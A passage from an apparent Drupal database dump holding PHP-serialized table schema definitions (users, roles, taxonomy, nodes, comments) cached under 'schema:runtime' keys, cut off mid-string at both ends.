null\";b:1;s:7:\"default\";i:0;}s:4:\"info\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;}}s:11:\"primary key\";a:1:{i:0;s:8:\"filename\";}s:7:\"indexes\";a:2:{s:11:\"system_list\";a:5:{i:0;s:6:\"status\";i:1;s:9:\"bootstrap\";i:2;s:4:\"type\";i:3;s:6:\"weight\";i:4;s:4:\"name\";}s:9:\"type_name\";a:2:{i:0;s:4:\"type\";i:1;s:4:\"name\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:6:\"system\";}s:9:\"url_alias\";a:5:{s:6:\"fields\";a:4:{s:3:\"pid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:6:\"source\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"alias\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"pid\";}s:7:\"indexes\";a:2:{s:18:\"alias_language_pid\";a:3:{i:0;s:5:\"alias\";i:1;s:8:\"language\";i:2;s:3:\"pid\";}s:19:\"source_language_pid\";a:3:{i:0;s:6:\"source\";i:1;s:8:\"language\";i:2;s:3:\"pid\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:9:\"url_alias\";}s:18:\"taxonomy_term_data\";a:6:{s:6:\"fields\";a:6:{s:3:\"tid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"vid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"name\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:11:\"description\";a:4:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:12:\"translatable\";b:1;}s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:3:\"tid\";}s:12:\"foreign keys\";a:1:{s:10:\"vocabulary\";a:2:{s:5:\"table\";s:19:\"taxonomy_vocabulary\";s:7:\"columns\";a:1:{s:3:\"vid\";s:3:\"vid\";}}}s:7:\"indexes\";a:3:{s:13:\"taxonomy_tree\";a:3:{i:0;s:3:\"vid\";i:1;s:6:\"weight\";i:2;s:4:\"name\";}s:8:\"vid_name\";a:2:{i:0;s:3:\"vid\";i:1;s:4:\"name\";}s:4:\"name\";a:1:{i:0;s:4:\"name\";}}s:6:\"module\";s:8:\"taxonomy\";s:4:\"name\";s:18:\"taxonomy_term_data\";}s:23:\"taxonomy_term_hierarchy\";a:6:{s:6:\"fields\";a:2:{s:3:\"tid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"parent\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"parent\";a:1:{i:0;s:6:\"parent\";}}s:12:\"foreign keys\";a:1:{s:18:\"taxonomy_term_data\";a:2:{s:5:\"table\";s:18:\"taxonomy_term_data\";s:7:\"columns\";a:1:{s:3:\"tid\";s:3:\"tid\";}}}s:11:\"primary key\";a:2:{i:0;s:3:\"tid\";i:1;s:6:\"parent\";}s:6:\"module\";s:8:\"taxonomy\";s:4:\"name\";s:23:\"taxonomy_term_hierarchy\";}s:19:\"taxonomy_vocabulary\";a:6:{s:6:\"fields\";a:7:{s:3:\"vid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:4:\"name\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:12:\"machine_name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:11:\"description\";a:4:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:12:\"translatable\";b:1;}s:9:\"hierarchy\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:3:\"vid\";}s:7:\"indexes\";a:1:{s:4:\"list\";a:2:{i:0;s:6:\"weight\";i:1;s:4:\"name\";}}s:11:\"unique keys\";a:1:{s:12:\"machine_name\";a:1:{i:0;s:12:\"machine_name\";}}s:6:\"module\";s:8:\"taxonomy\";s:4:\"name\";s:19:\"taxonomy_vocabulary\";}s:14:\"taxonomy_index\";a:5:{s:6:\"fields\";a:4:{s:3:\"nid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"tid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"sticky\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:0;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:2:{s:9:\"term_node\";a:3:{i:0;s:3:\"tid\";i:1;s:6:\"sticky\";i:2;s:7:\"created\";}s:3:\"nid\";a:1:{i:0;s:3:\"nid\";}}s:12:\"foreign keys\";a:2:{s:12:\"tracked_node\";a:2:{s:5:\"table\";s:4:\"node\";s:7:\"columns\";a:1:{s:3:\"nid\";s:3:\"nid\";}}s:4:\"term\";a:2:{s:5:\"table\";s:18:\"taxonomy_term_data\";s:7:\"columns\";a:1:{s:3:\"tid\";s:3:\"tid\";}}}s:6:\"module\";s:8:\"taxonomy\";s:4:\"name\";s:14:\"taxonomy_index\";}s:12:\"cache_update\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:6:\"update\";s:4:\"name\";s:12:\"cache_update\";}s:7:\"authmap\";a:6:{s:6:\"fields\";a:4:{s:3:\"aid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:8:\"authname\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:11:\"unique keys\";a:1:{s:8:\"authname\";a:1:{i:0;s:8:\"authname\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"aid\";}s:12:\"foreign keys\";a:1:{s:4:\"user\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:4:\"user\";s:4:\"name\";s:7:\"authmap\";}s:15:\"role_permission\";a:6:{s:6:\"fields\";a:3:{s:3:\"rid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:10:\"permission\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:11:\"primary key\";a:2:{i:0;s:3:\"rid\";i:1;s:10:\"permission\";}s:7:\"indexes\";a:1:{s:10:\"permission\";a:1:{i:0;s:10:\"permission\";}}s:12:\"foreign keys\";a:1:{s:4:\"role\";a:2:{s:5:\"table\";s:4:\"role\";s:7:\"columns\";a:1:{s:3:\"rid\";s:3:\"rid\";}}}s:6:\"module\";s:4:\"user\";s:4:\"name\";s:15:\"role_permission\";}s:4:\"role\";a:6:{s:6:\"fields\";a:3:{s:3:\"rid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:4:\"name\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"unique keys\";a:1:{s:4:\"name\";a:1:{i:0;s:4:\"name\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"rid\";}s:7:\"indexes\";a:1:{s:11:\"name_weight\";a:2:{i:0;s:4:\"name\";i:1;s:6:\"weight\";}}s:6:\"module\";s:4:\"user\";s:4:\"name\";s:4:\"role\";}s:5:\"users\";a:7:{s:6:\"fields\";a:16:{s:3:\"uid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:60;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"pass\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"mail\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:254;s:8:\"not null\";b:0;s:7:\"default\";s:0:\"\";}s:5:\"theme\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:9:\"signature\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:16:\"signature_format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"access\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"login\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:8:\"timezone\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"picture\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"init\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:254;s:8:\"not null\";b:0;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:4:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:9:\"serialize\";b:1;}}s:7:\"indexes\";a:4:{s:6:\"access\";a:1:{i:0;s:6:\"access\";}s:7:\"created\";a:1:{i:0;s:7:\"created\";}s:4:\"mail\";a:1:{i:0;s:4:\"mail\";}s:7:\"picture\";a:1:{i:0;s:7:\"picture\";}}s:11:\"unique keys\";a:1:{s:4:\"name\";a:1:{i:0;s:4:\"name\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"uid\";}s:12:\"foreign keys\";a:1:{s:16:\"signature_format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:16:\"signature_format\";s:6:\"format\";}}}s:6:\"module\";s:4:\"user\";s:4:\"name\";s:5:\"users\";}s:11:\"users_roles\";a:6:{s:6:\"fields\";a:2:{s:3:\"uid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"rid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:2:{i:0;s:3:\"uid\";i:1;s:3:\"rid\";}s:7:\"indexes\";a:1:{s:3:\"rid\";a:1:{i:0;s:3:\"rid\";}}s:12:\"foreign keys\";a:2:{s:4:\"user\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}s:4:\"role\";a:2:{s:5:\"table\";s:4:\"role\";s:7:\"columns\";a:1:{s:3:\"rid\";s:3:\"rid\";}}}s:6:\"module\";s:4:\"user\";s:4:\"name\";s:11:\"users_roles\";}}',0,1444940177,1),('schema:runtime:','a:4:{s:4:\"node\";a:7:{s:6:\"fields\";a:14:{s:3:\"nid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"vid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;s:7:\"default\";N;}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:1;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"changed\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"comment\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"promote\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"sticky\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"tnid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"translate\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:10:{s:12:\"node_changed\";a:1:{i:0;s:7:\"changed\";}s:12:\"node_created\";a:1:{i:0;s:7:\"created\";}s:14:\"node_frontpage\";a:4:{i:0;s:7:\"promote\";i:1;s:6:\"status\";i:2;s:6:\"sticky\";i:3;s:7:\"created\";}s:16:\"node_status_type\";a:3:{i:0;s:6:\"status\";i:1;s:4:\"type\";i:2;s:3:\"nid\";}s:15:\"node_title_type\";a:2:{i:0;s:5:\"title\";i:1;a:2:{i:0;s:4:\"type\";i:1;i:4;}}s:9:\"node_type\";a:1:{i:0;a:2:{i:0;s:4:\"type\";i:1;i:4;}}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}s:4:\"tnid\";a:1:{i:0;s:4:\"tnid\";}s:9:\"translate\";a:1:{i:0;s:9:\"translate\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}}s:11:\"unique keys\";a:1:{s:3:\"vid\";a:1:{i:0;s:3:\"vid\";}}s:12:\"foreign keys\";a:2:{s:13:\"node_revision\";a:2:{s:5:\"table\";s:13:\"node_revision\";s:7:\"columns\";a:1:{s:3:\"vid\";s:3:\"vid\";}}s:11:\"node_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:11:\"primary key\";a:1:{i:0;s:3:\"nid\";}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:4:\"node\";}s:13:\"node_revision\";a:6:{s:6:\"fields\";a:10:{s:3:\"nid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"vid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"log\";a:3:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:9:\"timestamp\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:1;}s:7:\"comment\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"promote\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"sticky\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:2:{s:3:\"nid\";a:1:{i:0;s:3:\"nid\";}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"vid\";}s:12:\"foreign keys\";a:2:{s:14:\"versioned_node\";a:2:{s:5:\"table\";s:4:\"node\";s:7:\"columns\";a:1:{s:3:\"nid\";s:3:\"nid\";}}s:14:\"version_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:13:\"node_revision\";}s:16:\"date_format_type\";a:5:{s:6:\"fields\";a:3:{s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:5:\"title\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:6:\"locked\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:7:\"default\";i:0;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:4:\"type\";}s:7:\"indexes\";a:1:{s:5:\"title\";a:1:{i:0;s:5:\"title\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:16:\"date_format_type\";}s:12:\"date_formats\";a:5:{s:6:\"fields\";a:4:{s:4:\"dfid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;s:8:\"unsigned\";b:1;}s:6:\"format\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:100;s:8:\"not null\";b:1;s:6:\"binary\";b:1;}s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:6:\"locked\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:7:\"default\";i:0;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:4:\"dfid\";}s:11:\"unique keys\";a:1:{s:7:\"formats\";a:2:{i:0;s:6:\"format\";i:1;s:4:\"type\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:12:\"date_formats\";}}',0,1446849417,1),('schema:runtime:1','a:11:{s:7:\"comment\";a:6:{s:6:\"fields\";a:14:{s:3:\"cid\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:3:\"pid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"nid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"subject\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"hostname\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"changed\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:1;s:4:\"size\";s:4:\"tiny\";}s:6:\"thread\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:4:\"name\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:60;s:8:\"not null\";b:0;}s:4:\"mail\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:0;}s:8:\"homepage\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:7:\"indexes\";a:5:{s:18:\"comment_status_pid\";a:2:{i:0;s:3:\"pid\";i:1;s:6:\"status\";}s:15:\"comment_num_new\";a:5:{i:0;s:3:\"nid\";i:1;s:6:\"status\";i:2;s:7:\"created\";i:3;s:3:\"cid\";i:4;s:6:\"thread\";}s:11:\"comment_uid\";a:1:{i:0;s:3:\"uid\";}s:20:\"comment_nid_language\";a:2:{i:0;s:3:\"nid\";i:1;s:8:\"language\";}s:15:\"comment_created\";a:1:{i:0;s:7:\"created\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:12:\"foreign keys\";a:2:{s:12:\"comment_node\";a:2:{s:5:\"table\";s:4:\"node\";s:7:\"columns\";a:1:{s:3:\"nid\";s:3:\"nid\";}}s:14:\"comment_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:7:\"comment\";s:4:\"name\";s:7:\"comment\";}s:4:\"node\";a:7:{s:6:\"fields\";a:14:{s:3:\"nid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"vid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;s:7:\"default\";N;}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:1;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"changed\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"comment\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"promote\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"sticky\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"tnid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"translate\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:10:{s:12:\"node_changed\";a:1:{i:0;s:7:\"changed\";}s:12:\"node_created\";a:1:{i:0;s:7:\"created\";}s:14:\"node_frontpage\";a:4:{i:0;s:7:\"promote\";i:1;s:6:\"status\";i:2;s:6:\"sticky\";i:3;s:7:\"created\";}s:16:\"node_status_type\";a:3:{i:0;s:6:\"status\";i:1;s:4:\"type\";i:2;s:3:\"nid\";}s:15:\"node_title_type\";a:2:{i:0;s:5:\"title\";i:1;a:2:{i:0;s:4:\"type\";i:1;i:4;}}s:9:\"node_type\";a:1:{i:0;a:2:{i:0;s:4:\"type\";i:1;i:4;}}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}s:4:\"tnid\";a:1:{i:0;s:4:\"tnid\";}s:9:\"translate\";a:1:{i:0;s:9:\"translate\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}}s:11:\"unique keys\";a:1:{s:3:\"vid\";a:1:{i:0;s:3:\"vid\";}}s:12:\"foreign keys\";a:2:{s:13:\"node_revision\";a:2:{s:5:\"table\";s:13:\"node_revision\";s:7:\"columns\";a:1:{s:3:\"vid\";s:3:\"vid\";}}s:11:\"node_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:11:\"primary key\";a:1:{i:0;s:3:\"nid\";}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:4:\"node\";}s:13:\"node_revision\";a:6:{s:6:\"fields\";a:10:{s:3:\"nid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"vid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"log\";a:3:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:9:\"timestamp\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:1;}s:7:\"comment\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"promote\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"sticky\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:2:{s:3:\"nid\";a:1:{i:0;s:3:\"nid\";}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"vid\";}s:12:\"foreign 